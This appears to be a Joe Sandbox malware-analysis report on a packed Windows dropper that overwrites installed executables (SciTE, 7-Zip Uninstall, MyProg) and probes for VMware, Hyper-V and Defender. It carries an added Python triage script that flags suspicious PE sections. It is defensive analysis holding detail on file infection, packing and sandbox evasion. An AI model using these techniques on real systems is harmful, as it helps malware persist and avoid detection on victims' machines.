Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Unpacked PE file: 1.2.vXQpuA.exe.610000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: ku
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: section name: ku
              Source: vXQpuA.exe.0.dr | Static PE information: section name: .aspack
              Source: vXQpuA.exe.0.dr | Static PE information: section name: .adata
              Source: Uninstall.exe.1.dr | Static PE information: section name: EpNuZ
              Source: MyProg.exe.1.dr | Static PE information: section name: PELIB
              Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR
              Source: SciTE.exe.1.dr | Static PE information: section name: u
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00376E7B push ebp; ret 0_2_00376E7E
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00376E7A push ebp; ret 0_2_00376E7E
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00349EC6 push ecx; ret 0_2_00349ED9
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_00616076 push 006114E1h; ret 1_2_00616425
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_00611638 push dword ptr [00613084h]; ret 1_2_0061170E
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_0061600A push ebp; ret 1_2_0061600D
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_00612D9B push ecx; ret 1_2_00612DAB
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: section name: ku entropy: 6.934525403554348
              Source: vXQpuA.exe.0.dr | Static PE information: section name: .text entropy: 7.81169422100848
              Source: Uninstall.exe.1.dr | Static PE information: section name: EpNuZ entropy: 6.934606960353715
              Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR entropy: 6.934533938780926
              Source: SciTE.exe.1.dr | Static PE information: section name: u entropy: 6.9351052031329194
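The Data Obfuscation signatures above are all static properties of the PE header: a two-letter section name ("ku") holding the entry point, sections marked both writable and executable after unpacking, and per-section entropy close to 7 bits per byte. The same markers recur on the three host binaries the dropper overwrote (sections "EpNuZ", "Y|uR" and "u", each with entropy 6.9345 to 6.9351), which is what you would expect when one appended code body is written into several hosts. The script below is an added example, not Joe Sandbox code, that reproduces those checks with the standard library only. The PE image it inspects is constructed in memory to mimic the report's findings; it is not the analysed sample, and the entropy threshold of 6.8 is an assumption chosen to sit under the values listed above.

```python
"""Static PE triage reproducing the 'Data Obfuscation' checks above: odd
section names, entry point outside the standard sections, sections that are
writable and executable, and high per-section entropy.
Added example (not Joe Sandbox code), stdlib only. build_test_image() is a
constructed PE32 that mimics the report's findings, not the analysed file."""
import hashlib
import math
import struct
from collections import Counter

# Section names a linker normally emits; anything else is worth a look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT", "CODE", "DATA"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
ENTROPY_THRESHOLD = 6.8  # assumption: every section flagged in the report is >= 6.93


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for empty or constant data, 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE32/PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20                     # optional header follows the 20-byte COFF header
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    table = opt + opt_size              # section table follows the optional header
    sections = []
    for i in range(nsections):
        off = table + 40 * i
        raw_name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", image, off)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        sections.append({"name": raw_name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "characteristics": chars,
                         "entropy": shannon_entropy(image[rptr:rptr + rsize])})
    return entry_rva, sections


def triage(image: bytes, threshold: float = ENTROPY_THRESHOLD):
    """Return human-readable findings; an unremarkable file yields an empty list."""
    entry_rva, sections = parse_sections(image)
    findings, ep_section = [], None
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], 1):
            ep_section = s
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"unusual section name {s['name']!r}")
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {s['name']!r} is writable and executable")
        if s["entropy"] >= threshold:
            findings.append(f"section {s['name']!r} entropy {s['entropy']:.2f}")
    if ep_section is None:
        findings.append("entry point outside every section")
    elif ep_section["name"] not in STANDARD_SECTIONS:
        findings.append(f"entry point in non-standard section {ep_section['name']!r}")
    return findings


def build_test_image() -> bytes:
    """Constructed PE32: plain .text/.rdata plus an appended 'ku' section that is
    writable+executable, high-entropy and holds the entry point, as in the report."""
    def align(x, a):
        return (x + a - 1) // a * a
    file_align, sect_align = 0x200, 0x1000
    payload = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4 KiB, ~7.95 bits/byte
    layout = [(b".text", b"\x55\x8b\xec" + b"\x90" * 1000 + b"\x5d\xc3", 0x60000020),  # CODE|EXECUTE|READ
              (b".rdata", b"\0" * 1024, 0x40000040),                                # INITIALIZED_DATA|READ
              (b"ku", payload, 0xE0000020)]                                           # CODE|EXECUTE|READ|WRITE
    headers_size = align(0x40 + 4 + 20 + 0xE0 + 40 * len(layout), file_align)
    raw_ptr, va, entry_rva, table, blobs = headers_size, 0x1000, 0, b"", b""
    for name, data, chars in layout:
        rsize = align(len(data), file_align)
        if name == b"ku":
            entry_rva = va
        table += struct.pack("<8sIIIIIIHHI", name, len(data), va, rsize, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(rsize, b"\0")
        raw_ptr += rsize
        va += align(len(data), sect_align)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0xE0, 0x0102)  # i386, 3 sections
    opt = struct.pack("<HBBIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, sect_align, file_align,
                       6, 0, 0, 0, 6, 0, 0, va, headers_size, 0, 2, 0,
                       0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * 128                                                          # 16 empty data directories
    header = (dos + b"PE\0\0" + coff + opt + table).ljust(headers_size, b"\0")
    return header + blobs


if __name__ == "__main__":
    for line in triage(build_test_image()):
        print(line)
```

Run against the files from the report, `triage(open(path, "rb").read())` would flag "ku" on the sample and the infected hosts for all three reasons at once; a benign installer such as an unmodified 7-Zip Uninstall.exe only has standard section names and a read-only .text. The near-identical entropy across the three hosts is a cheap way to cluster infected files before any signature is written.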

              Persistence and Installation Behavior

              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | File created: C:\Users\user\AppData\Local\Temp\vXQpuA.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_003202C0 StartServiceCtrlDispatcherA,0_2_003202C0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00343C20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00343C20
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
              Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | API coverage: 4.9 %
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_00611718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00611754h 1_2_00611718
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00357261 FindFirstFileExW,0_2_00357261
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_006129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_006129E2
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_00612B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00612B8C
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(g
              Source: Amcache.hve.5.dr | Binary or memory string: VMware
              Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
              Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWo
              Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
              Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D15000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
              Source: Amcache.hve.5.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
              Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
              Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
              Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | API call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00349C79 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00349C79
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00374044 mov eax, dword ptr fs:[00000030h] 0_2_00374044
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00352633 mov eax, dword ptr fs:[00000030h] 0_2_00352633
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00356EFD mov eax, dword ptr fs:[00000030h] 0_2_00356EFD
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_003581A7 GetProcessHeap,0_2_003581A7
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00349359 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00349359
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00349C79 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00349C79
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0034CD36 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0034CD36
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00349E0F SetUnhandledExceptionFilter,0_2_00349E0F
              Source: SciTE.exe.1.dr | Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00349A99 cpuid 0_2_00349A99
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00349EE1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00349EE1
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_003219B0 LoadLibraryA,LoadLibraryA,__aulldiv,Sleep,GetModuleFileNameA,GetUserNameA,DeleteFileA,operator!=,__aulldiv,_strstr,operator!=,_strstr,ShellExecuteA,WinExec,WinExec,0_2_003219B0
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_0061139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_0061139F
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
              Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: vXQpuA.exe PID: 5064, type: MEMORYSTR
              Source: Yara match | File source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: vXQpuA.exe PID: 5064, type: MEMORYSTR
              Source: Yara match | File source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00312010 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00312010
              MITRE ATT&CK Matrix

              Listed per tactic. A number in parentheses is the figure Joe Sandbox shows in that matrix cell (its signature count for the technique); entries without a number carry no figure in the report.

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: Native API (1); Command and Scripting Interpreter (3); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: DLL Side-Loading (1); Windows Service (4); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (4); Process Injection (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (2); Compile After Delivery; Indicator Removal from Tools
              Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: System Time Discovery (11); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (14); Query Registry (1); Security Software Discovery (131); Process Discovery (1); System Owner/User Discovery (1)
              Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
